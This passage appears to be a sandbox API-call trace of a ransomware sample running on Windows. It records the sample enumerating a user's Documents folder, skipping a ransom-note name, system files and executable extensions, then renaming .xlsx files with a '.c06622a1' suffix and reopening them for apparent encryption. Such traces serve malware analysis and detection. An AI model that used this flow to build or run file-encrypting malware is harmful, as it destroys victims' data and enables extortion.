Length=0x80) returned 0x334fac47 [0148.853] RtlComputeCrc32 (PartialCrc=0xac47, Buffer=0x4790094, Length=0x80) returned 0xc90fadb7 [0148.853] RtlComputeCrc32 (PartialCrc=0xadb7, Buffer=0x4790094, Length=0x80) returned 0xf1a68319 [0148.853] RtlComputeCrc32 (PartialCrc=0x8319, Buffer=0x4790094, Length=0x80) returned 0xb2644514 [0148.853] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4790020) returned 1 [0148.853] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44d0078) returned 1 [0148.853] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44e0080) returned 1 [0148.853] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91300db0, ftCreationTime.dwHighDateTime=0x1d5c0ca, ftLastAccessTime.dwLowDateTime=0x2acae410, ftLastAccessTime.dwHighDateTime=0x1d5a16b, ftLastWriteTime.dwLowDateTime=0x2acae410, ftLastWriteTime.dwHighDateTime=0x1d5a16b, nFileSizeHigh=0x0, nFileSizeLow=0x127bd, dwReserved0=0x0, dwReserved1=0x0, cFileName="5DLy5.xlsx", cAlternateFileName="5DLY5~1.XLS")) returned 1 [0148.853] _wcsicmp (_Str1="5DLy5.xlsx", _Str2="README.c06622a1.TXT") returned -61 [0148.853] wcsstr (_Str="5DLy5.xlsx", _SubStr="README") returned 0x0 [0148.853] _wcsicmp (_Str1="autorun.inf", _Str2="5DLy5.xlsx") returned 44 [0148.853] wcslen (_String="autorun.inf") returned 0xb [0148.853] _wcsicmp (_Str1="boot.ini", _Str2="5DLy5.xlsx") returned 45 [0148.853] wcslen (_String="boot.ini") returned 0x8 [0148.853] _wcsicmp (_Str1="bootfont.bin", _Str2="5DLy5.xlsx") returned 45 [0148.853] wcslen (_String="bootfont.bin") returned 0xc [0148.853] _wcsicmp (_Str1="bootsect.bak", _Str2="5DLy5.xlsx") returned 45 [0148.853] wcslen (_String="bootsect.bak") returned 0xc [0148.853] _wcsicmp (_Str1="desktop.ini", _Str2="5DLy5.xlsx") returned 47 [0148.853] wcslen (_String="desktop.ini") returned 0xb [0148.853] _wcsicmp (_Str1="iconcache.db", _Str2="5DLy5.xlsx") returned 52 [0148.853] wcslen (_String="iconcache.db") returned 0xc [0148.853] _wcsicmp (_Str1="ntldr", _Str2="5DLy5.xlsx") returned 57 [0148.853] wcslen (_String="ntldr") returned 0x5 [0148.853] _wcsicmp (_Str1="ntuser.dat", _Str2="5DLy5.xlsx") returned 57 [0148.853] wcslen (_String="ntuser.dat") returned 0xa [0148.853] _wcsicmp (_Str1="ntuser.dat.log", _Str2="5DLy5.xlsx") returned 57 [0148.853] wcslen (_String="ntuser.dat.log") returned 0xe [0148.853] _wcsicmp (_Str1="ntuser.ini", _Str2="5DLy5.xlsx") returned 57 [0148.853] wcslen (_String="ntuser.ini") returned 0xa [0148.853] _wcsicmp (_Str1="thumbs.db", _Str2="5DLy5.xlsx") returned 63 [0148.853] wcslen (_String="thumbs.db") returned 0x9 [0148.854] _wcsicmp (_Str1="386", _Str2="xlsx") returned -69 [0148.854] wcslen (_String="386") returned 0x3 [0148.854] _wcsicmp (_Str1="adv", _Str2="xlsx") returned -23 [0148.854] wcslen (_String="adv") returned 0x3 [0148.854] _wcsicmp (_Str1="ani", _Str2="xlsx") returned -23 [0148.854] wcslen (_String="ani") returned 0x3 [0148.854] _wcsicmp (_Str1="bat", _Str2="xlsx") returned -22 [0148.854] wcslen (_String="bat") returned 0x3 [0148.854] _wcsicmp (_Str1="bin", _Str2="xlsx") returned -22 [0148.854] wcslen (_String="bin") returned 0x3 [0148.854] _wcsicmp (_Str1="cab", _Str2="xlsx") returned -21 [0148.854] wcslen (_String="cab") returned 0x3 [0148.854] _wcsicmp (_Str1="cmd", _Str2="xlsx") returned -21 [0148.854] wcslen (_String="cmd") returned 0x3 [0148.854] _wcsicmp (_Str1="com", _Str2="xlsx") returned -21 [0148.854] wcslen (_String="com") returned 0x3 [0148.854] _wcsicmp (_Str1="cpl", _Str2="xlsx") returned -21 [0148.854] wcslen (_String="cpl") returned 0x3 [0148.854] _wcsicmp (_Str1="cur", _Str2="xlsx") returned -21 [0148.854] wcslen (_String="cur") returned 0x3 [0148.854] _wcsicmp (_Str1="deskthemepack", _Str2="xlsx") returned -20 [0148.854] wcslen (_String="deskthemepack") returned 0xd [0148.854] _wcsicmp (_Str1="diagcab", _Str2="xlsx") returned -20 [0148.854] wcslen (_String="diagcab") returned 0x7 [0148.854] _wcsicmp (_Str1="diagcfg", _Str2="xlsx") returned -20 [0148.854] wcslen (_String="diagcfg") returned 0x7 [0148.854] _wcsicmp (_Str1="diagpkg", _Str2="xlsx") returned -20 [0148.854] wcslen (_String="diagpkg") returned 0x7 [0148.854] _wcsicmp (_Str1="dll", _Str2="xlsx") returned -20 [0148.854] wcslen (_String="dll") returned 0x3 [0148.854] _wcsicmp (_Str1="drv", _Str2="xlsx") returned -20 [0148.854] wcslen (_String="drv") returned 0x3 [0148.854] _wcsicmp (_Str1="exe", _Str2="xlsx") returned -19 [0148.854] wcslen (_String="exe") returned 0x3 [0148.854] _wcsicmp (_Str1="hlp", _Str2="xlsx") returned -16 [0148.854] wcslen (_String="hlp") returned 0x3 [0148.855] _wcsicmp (_Str1="icl", _Str2="xlsx") returned -15 [0148.855] wcslen (_String="icl") returned 0x3 [0148.855] _wcsicmp (_Str1="icns", _Str2="xlsx") returned -15 [0148.855] wcslen (_String="icns") returned 0x4 [0148.855] _wcsicmp (_Str1="ico", _Str2="xlsx") returned -15 [0148.855] wcslen (_String="ico") returned 0x3 [0148.855] _wcsicmp (_Str1="ics", _Str2="xlsx") returned -15 [0148.855] wcslen (_String="ics") returned 0x3 [0148.855] _wcsicmp (_Str1="idx", _Str2="xlsx") returned -15 [0148.855] wcslen (_String="idx") returned 0x3 [0148.855] _wcsicmp (_Str1="ldf", _Str2="xlsx") returned -12 [0148.855] wcslen (_String="ldf") returned 0x3 [0148.855] _wcsicmp (_Str1="lnk", _Str2="xlsx") returned -12 [0148.855] wcslen (_String="lnk") returned 0x3 [0148.855] _wcsicmp (_Str1="mod", _Str2="xlsx") returned -11 [0148.855] wcslen (_String="mod") returned 0x3 [0148.855] _wcsicmp (_Str1="mpa", _Str2="xlsx") returned -11 [0148.855] wcslen (_String="mpa") returned 0x3 [0148.855] _wcsicmp (_Str1="msc", _Str2="xlsx") returned -11 [0148.855] wcslen (_String="msc") returned 0x3 [0148.855] _wcsicmp (_Str1="msp", _Str2="xlsx") returned -11 [0148.855] wcslen (_String="msp") returned 0x3 [0148.855] _wcsicmp (_Str1="msstyles", _Str2="xlsx") returned -11 [0148.855] wcslen (_String="msstyles") returned 0x8 [0148.855] _wcsicmp (_Str1="msu", _Str2="xlsx") returned -11 [0148.855] wcslen (_String="msu") returned 0x3 [0148.855] _wcsicmp (_Str1="nls", _Str2="xlsx") returned -10 [0148.855] wcslen (_String="nls") returned 0x3 [0148.855] _wcsicmp (_Str1="nomedia", _Str2="xlsx") returned -10 [0148.855] wcslen (_String="nomedia") returned 0x7 [0148.855] _wcsicmp (_Str1="ocx", _Str2="xlsx") returned -9 [0148.855] wcslen (_String="ocx") returned 0x3 [0148.855] _wcsicmp (_Str1="prf", _Str2="xlsx") returned -8 [0148.855] wcslen (_String="prf") returned 0x3 [0148.855] _wcsicmp (_Str1="ps1", _Str2="xlsx") returned -8 [0148.855] wcslen (_String="ps1") returned 0x3 [0148.855] _wcsicmp (_Str1="rom", _Str2="xlsx") returned -6 [0148.855] wcslen (_String="rom") returned 0x3 [0148.856] _wcsicmp (_Str1="rtp", _Str2="xlsx") returned -6 [0148.856] wcslen (_String="rtp") returned 0x3 [0148.856] _wcsicmp (_Str1="scr", _Str2="xlsx") returned -5 [0148.856] wcslen (_String="scr") returned 0x3 [0148.856] _wcsicmp (_Str1="shs", _Str2="xlsx") returned -5 [0148.856] wcslen (_String="shs") returned 0x3 [0148.856] _wcsicmp (_Str1="spl", _Str2="xlsx") returned -5 [0148.856] wcslen (_String="spl") returned 0x3 [0148.856] _wcsicmp (_Str1="sys", _Str2="xlsx") returned -5 [0148.856] wcslen (_String="sys") returned 0x3 [0148.856] _wcsicmp (_Str1="theme", _Str2="xlsx") returned -4 [0148.856] wcslen (_String="theme") returned 0x5 [0148.856] _wcsicmp (_Str1="themepack", _Str2="xlsx") returned -4 [0148.856] wcslen (_String="themepack") returned 0x9 [0148.856] _wcsicmp (_Str1="wpx", _Str2="xlsx") returned -1 [0148.856] wcslen (_String="wpx") returned 0x3 [0148.856] _wcsicmp (_Str1="lock", _Str2="xlsx") returned -12 [0148.856] wcslen (_String="lock") returned 0x4 [0148.856] _wcsicmp (_Str1="key", _Str2="xlsx") returned -13 [0148.856] wcslen (_String="key") returned 0x3 [0148.856] _wcsicmp (_Str1="hta", _Str2="xlsx") returned -16 [0148.856] wcslen (_String="hta") returned 0x3 [0148.856] _wcsicmp (_Str1="msi", _Str2="xlsx") returned -11 [0148.856] wcslen (_String="msi") returned 0x3 [0148.856] _wcsicmp (_Str1="pdb", _Str2="xlsx") returned -8 [0148.856] wcslen (_String="pdb") returned 0x3 [0148.856] _wcsicmp (_Str1="sql", _Str2="xlsx") returned -5 [0148.856] wcslen (_String="sql") returned 0x3 [0148.856] _wcsicmp (_Str1="sqlite", _Str2="xlsx") returned -5 [0148.856] wcslen (_String="sqlite") returned 0x6 [0148.856] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents")) returned 0x11 [0148.856] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44d0078 [0148.856] wcscpy (in: _Dest=0x44d0078, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" [0148.856] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x2b [0148.856] wcscpy (in: _Dest=0x44d00d0, _Source="5DLy5.xlsx" | out: _Dest="5DLy5.xlsx") returned="5DLy5.xlsx" [0148.857] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5DLy5.xlsx", dwFileAttributes=0x80) returned 1 [0148.857] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5DLy5.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\5dly5.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x650 [0148.857] SetFilePointerEx (in: hFile=0x650, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.857] ReadFile (in: hFile=0x650, lpBuffer=0x3feb74, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fec04, lpOverlapped=0x0 | out: lpBuffer=0x3feb74*, lpNumberOfBytesRead=0x3fec04*=0x90, lpOverlapped=0x0) returned 1 [0148.858] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3feb74, Length=0x80) returned 0x763517ca [0148.858] RtlComputeCrc32 (PartialCrc=0x17ca, Buffer=0x3feb74, Length=0x80) returned 0x3cbff0e5 [0148.858] RtlComputeCrc32 (PartialCrc=0xf0e5, Buffer=0x3feb74, Length=0x80) returned 0x3f7ddc55 [0148.858] RtlComputeCrc32 (PartialCrc=0xdc55, Buffer=0x3feb74, Length=0x80) returned 0x662b233d [0148.858] RtlComputeCrc32 (PartialCrc=0x233d, Buffer=0x3feb74, Length=0x80) returned 0x53db3c80 [0148.858] CloseHandle (hObject=0x650) returned 1 [0148.858] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44e0080 [0148.858] wcscpy (in: _Dest=0x44e0080, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5DLy5.xlsx" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5DLy5.xlsx") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5DLy5.xlsx" [0148.858] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5DLy5.xlsx") returned 0x36 [0148.858] wcscpy (in: _Dest=0x44e00ec, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0148.858] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5DLy5.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\5dly5.xlsx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5DLy5.xlsx.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\5dly5.xlsx.c06622a1"), dwFlags=0x8) returned 1 [0148.861] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5DLy5.xlsx.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\5dly5.xlsx.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x650 [0148.861] CreateIoCompletionPort (FileHandle=0x650, ExistingCompletionPort=0x5dc, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0148.861] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4820020 [0148.866] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x746ff539 [0148.866] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x55243c71 [0148.866] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5f96534d [0148.866] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5562eb08 [0148.866] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x58dbe46d [0148.866] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4fd89fef [0148.866] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x718c33ef [0148.866] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x18933ce2 [0148.870] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4820094, Length=0x80) returned 0xc67015ea [0148.870] RtlComputeCrc32 (PartialCrc=0x15ea, Buffer=0x4820094, Length=0x80) returned 0x9d58165c [0148.870] RtlComputeCrc32 (PartialCrc=0x165c, Buffer=0x4820094, Length=0x80) returned 0x739cae00 [0148.870] RtlComputeCrc32 (PartialCrc=0xae00, Buffer=0x4820094, Length=0x80) returned 0x92176c21 [0148.870] RtlComputeCrc32 (PartialCrc=0x6c21, Buffer=0x4820094, Length=0x80) returned 0x5d37db5d [0148.870] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4820020) returned 1 [0148.870] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44d0078) returned 1 [0148.870] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44e0080) returned 1 [0148.870] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27777470, ftCreationTime.dwHighDateTime=0x1d5e6a5, ftLastAccessTime.dwLowDateTime=0x2d38bc20, ftLastAccessTime.dwHighDateTime=0x1d5e0ab, ftLastWriteTime.dwLowDateTime=0x2d38bc20, ftLastWriteTime.dwHighDateTime=0x1d5e0ab, nFileSizeHigh=0x0, nFileSizeLow=0x104bb, dwReserved0=0x0, dwReserved1=0x0, cFileName="5muj95.xlsx", cAlternateFileName="5MUJ95~1.XLS")) returned 1 [0148.870] _wcsicmp (_Str1="5muj95.xlsx", _Str2="README.c06622a1.TXT") returned -61 [0148.870] wcsstr (_Str="5muj95.xlsx", _SubStr="README") returned 0x0 [0148.870] _wcsicmp (_Str1="autorun.inf", _Str2="5muj95.xlsx") returned 44 [0148.870] wcslen (_String="autorun.inf") returned 0xb [0148.870] _wcsicmp (_Str1="boot.ini", _Str2="5muj95.xlsx") returned 45 [0148.870] wcslen (_String="boot.ini") returned 0x8 [0148.870] _wcsicmp (_Str1="bootfont.bin", _Str2="5muj95.xlsx") returned 45 [0148.870] wcslen (_String="bootfont.bin") returned 0xc [0148.871] _wcsicmp (_Str1="bootsect.bak", _Str2="5muj95.xlsx") returned 45 [0148.871] wcslen (_String="bootsect.bak") returned 0xc [0148.871] _wcsicmp (_Str1="desktop.ini", _Str2="5muj95.xlsx") returned 47 [0148.871] wcslen (_String="desktop.ini") returned 0xb [0148.871] _wcsicmp (_Str1="iconcache.db", _Str2="5muj95.xlsx") returned 52 [0148.871] wcslen (_String="iconcache.db") returned 0xc [0148.871] _wcsicmp (_Str1="ntldr", _Str2="5muj95.xlsx") returned 57 [0148.871] wcslen (_String="ntldr") returned 0x5 [0148.871] _wcsicmp (_Str1="ntuser.dat", _Str2="5muj95.xlsx") returned 57 [0148.871] wcslen (_String="ntuser.dat") returned 0xa [0148.871] _wcsicmp (_Str1="ntuser.dat.log", _Str2="5muj95.xlsx") returned 57 [0148.871] wcslen (_String="ntuser.dat.log") returned 0xe [0148.871] _wcsicmp (_Str1="ntuser.ini", _Str2="5muj95.xlsx") returned 57 [0148.871] wcslen (_String="ntuser.ini") returned 0xa [0148.871] _wcsicmp (_Str1="thumbs.db", _Str2="5muj95.xlsx") returned 63 [0148.871] wcslen (_String="thumbs.db") returned 0x9 [0148.871] _wcsicmp (_Str1="386", _Str2="xlsx") returned -69 [0148.871] wcslen (_String="386") returned 0x3 [0148.871] _wcsicmp (_Str1="adv", _Str2="xlsx") returned -23 [0148.871] wcslen (_String="adv") returned 0x3 [0148.871] _wcsicmp (_Str1="ani", _Str2="xlsx") returned -23 [0148.871] wcslen (_String="ani") returned 0x3 [0148.871] _wcsicmp (_Str1="bat", _Str2="xlsx") returned -22 [0148.871] wcslen (_String="bat") returned 0x3 [0148.871] _wcsicmp (_Str1="bin", _Str2="xlsx") returned -22 [0148.871] wcslen (_String="bin") returned 0x3 [0148.871] _wcsicmp (_Str1="cab", _Str2="xlsx") returned -21 [0148.871] wcslen (_String="cab") returned 0x3 [0148.871] _wcsicmp (_Str1="cmd", _Str2="xlsx") returned -21 [0148.871] wcslen (_String="cmd") returned 0x3 [0148.871] _wcsicmp (_Str1="com", _Str2="xlsx") returned -21 [0148.871] wcslen (_String="com") returned 0x3 [0148.871] _wcsicmp (_Str1="cpl", _Str2="xlsx") returned -21 [0148.871] wcslen (_String="cpl") returned 0x3 [0148.871] _wcsicmp (_Str1="cur", _Str2="xlsx") returned -21 [0148.871] wcslen (_String="cur") returned 0x3 [0148.871] _wcsicmp (_Str1="deskthemepack", _Str2="xlsx") returned -20 [0148.872] wcslen (_String="deskthemepack") returned 0xd [0148.872] _wcsicmp (_Str1="diagcab", _Str2="xlsx") returned -20 [0148.872] wcslen (_String="diagcab") returned 0x7 [0148.872] _wcsicmp (_Str1="diagcfg", _Str2="xlsx") returned -20 [0148.872] wcslen (_String="diagcfg") returned 0x7 [0148.872] _wcsicmp (_Str1="diagpkg", _Str2="xlsx") returned -20 [0148.872] wcslen (_String="diagpkg") returned 0x7 [0148.872] _wcsicmp (_Str1="dll", _Str2="xlsx") returned -20 [0148.872] wcslen (_String="dll") returned 0x3 [0148.872] _wcsicmp (_Str1="drv", _Str2="xlsx") returned -20 [0148.872] wcslen (_String="drv") returned 0x3 [0148.872] _wcsicmp (_Str1="exe", _Str2="xlsx") returned -19 [0148.872] wcslen (_String="exe") returned 0x3 [0148.872] _wcsicmp (_Str1="hlp", _Str2="xlsx") returned -16 [0148.872] wcslen (_String="hlp") returned 0x3 [0148.872] _wcsicmp (_Str1="icl", _Str2="xlsx") returned -15 [0148.872] wcslen (_String="icl") returned 0x3 [0148.872] _wcsicmp (_Str1="icns", _Str2="xlsx") returned -15 [0148.872] wcslen (_String="icns") returned 0x4 [0148.872] _wcsicmp (_Str1="ico", _Str2="xlsx") returned -15 [0148.872] wcslen (_String="ico") returned 0x3 [0148.872] _wcsicmp (_Str1="ics", _Str2="xlsx") returned -15 [0148.872] wcslen (_String="ics") returned 0x3 [0148.872] _wcsicmp (_Str1="idx", _Str2="xlsx") returned -15 [0148.872] wcslen (_String="idx") returned 0x3 [0148.872] _wcsicmp (_Str1="ldf", _Str2="xlsx") returned -12 [0148.872] wcslen (_String="ldf") returned 0x3 [0148.872] _wcsicmp (_Str1="lnk", _Str2="xlsx") returned -12 [0148.872] wcslen (_String="lnk") returned 0x3 [0148.872] _wcsicmp (_Str1="mod", _Str2="xlsx") returned -11 [0148.872] wcslen (_String="mod") returned 0x3 [0148.872] _wcsicmp (_Str1="mpa", _Str2="xlsx") returned -11 [0148.872] wcslen (_String="mpa") returned 0x3 [0148.872] _wcsicmp (_Str1="msc", _Str2="xlsx") returned -11 [0148.872] wcslen (_String="msc") returned 0x3 [0148.872] _wcsicmp (_Str1="msp", _Str2="xlsx") returned -11 [0148.872] wcslen (_String="msp") returned 0x3 [0148.872] _wcsicmp (_Str1="msstyles", _Str2="xlsx") returned -11 [0148.872] wcslen (_String="msstyles") returned 0x8 [0148.873] _wcsicmp (_Str1="msu", _Str2="xlsx") returned -11 [0148.873] wcslen (_String="msu") returned 0x3 [0148.873] _wcsicmp (_Str1="nls", _Str2="xlsx") returned -10 [0148.873] wcslen (_String="nls") returned 0x3 [0148.873] _wcsicmp (_Str1="nomedia", _Str2="xlsx") returned -10 [0148.873] wcslen (_String="nomedia") returned 0x7 [0148.873] _wcsicmp (_Str1="ocx", _Str2="xlsx") returned -9 [0148.873] wcslen (_String="ocx") returned 0x3 [0148.873] _wcsicmp (_Str1="prf", _Str2="xlsx") returned -8 [0148.873] wcslen (_String="prf") returned 0x3 [0148.873] _wcsicmp (_Str1="ps1", _Str2="xlsx") returned -8 [0148.873] wcslen (_String="ps1") returned 0x3 [0148.873] _wcsicmp (_Str1="rom", _Str2="xlsx") returned -6 [0148.873] wcslen (_String="rom") returned 0x3 [0148.873] _wcsicmp (_Str1="rtp", _Str2="xlsx") returned -6 [0148.873] wcslen (_String="rtp") returned 0x3 [0148.873] _wcsicmp (_Str1="scr", _Str2="xlsx") returned -5 [0148.873] wcslen (_String="scr") returned 0x3 [0148.873] _wcsicmp (_Str1="shs", _Str2="xlsx") returned -5 [0148.873] wcslen (_String="shs") returned 0x3 [0148.873] _wcsicmp (_Str1="spl", _Str2="xlsx") returned -5 [0148.873] wcslen (_String="spl") returned 0x3 [0148.873] _wcsicmp (_Str1="sys", _Str2="xlsx") returned -5 [0148.873] wcslen (_String="sys") returned 0x3 [0148.873] _wcsicmp (_Str1="theme", _Str2="xlsx") returned -4 [0148.873] wcslen (_String="theme") returned 0x5 [0148.873] _wcsicmp (_Str1="themepack", _Str2="xlsx") returned -4 [0148.873] wcslen (_String="themepack") returned 0x9 [0148.873] _wcsicmp (_Str1="wpx", _Str2="xlsx") returned -1 [0148.873] wcslen (_String="wpx") returned 0x3 [0148.873] _wcsicmp (_Str1="lock", _Str2="xlsx") returned -12 [0148.873] wcslen (_String="lock") returned 0x4 [0148.873] _wcsicmp (_Str1="key", _Str2="xlsx") returned -13 [0148.873] wcslen (_String="key") returned 0x3 [0148.873] _wcsicmp (_Str1="hta", _Str2="xlsx") returned -16 [0148.873] wcslen (_String="hta") returned 0x3 [0148.873] _wcsicmp (_Str1="msi", _Str2="xlsx") returned -11 [0148.873] wcslen (_String="msi") returned 0x3 [0148.873] _wcsicmp (_Str1="pdb", _Str2="xlsx") returned -8 [0148.874] wcslen (_String="pdb") returned 0x3 [0148.874] _wcsicmp (_Str1="sql", _Str2="xlsx") returned -5 [0148.874] wcslen (_String="sql") returned 0x3 [0148.874] _wcsicmp (_Str1="sqlite", _Str2="xlsx") returned -5 [0148.874] wcslen (_String="sqlite") returned 0x6 [0148.874] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents")) returned 0x11 [0148.874] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44d0078 [0148.874] wcscpy (in: _Dest=0x44d0078, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" [0148.874] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x2b [0148.874] wcscpy (in: _Dest=0x44d00d0, _Source="5muj95.xlsx" | out: _Dest="5muj95.xlsx") returned="5muj95.xlsx" [0148.874] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5muj95.xlsx", dwFileAttributes=0x80) returned 1 [0148.874] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5muj95.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\5muj95.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0148.874] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.874] ReadFile (in: hFile=0x1a8, lpBuffer=0x3feb74, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fec04, lpOverlapped=0x0 | out: lpBuffer=0x3feb74*, lpNumberOfBytesRead=0x3fec04*=0x90, lpOverlapped=0x0) returned 1 [0148.875] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3feb74, Length=0x80) returned 0x4b9ad445 [0148.875] RtlComputeCrc32 (PartialCrc=0xd445, Buffer=0x3feb74, Length=0x80) returned 0x578270f3 [0148.875] RtlComputeCrc32 (PartialCrc=0x70f3, Buffer=0x3feb74, Length=0x80) returned 0xc3521728 [0148.875] RtlComputeCrc32 (PartialCrc=0x1728, Buffer=0x3feb74, Length=0x80) returned 0xebd0ca7d [0148.875] RtlComputeCrc32 (PartialCrc=0xca7d, Buffer=0x3feb74, Length=0x80) returned 0x6ca70744 [0148.875] CloseHandle (hObject=0x1a8) returned 1 [0148.875] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44e0080 [0148.875] wcscpy (in: _Dest=0x44e0080, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5muj95.xlsx" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5muj95.xlsx") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5muj95.xlsx" [0148.875] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5muj95.xlsx") returned 0x37 [0148.875] wcscpy (in: _Dest=0x44e00ee, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0148.875] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5muj95.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\5muj95.xlsx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5muj95.xlsx.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\5muj95.xlsx.c06622a1"), dwFlags=0x8) returned 1 [0148.877] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5muj95.xlsx.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\5muj95.xlsx.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1a8 [0148.878] CreateIoCompletionPort (FileHandle=0x1a8, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0148.878] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x48b0020 [0148.885] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4d4c2561 [0148.885] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x2c836353 [0148.885] RtlRandomEx (in: 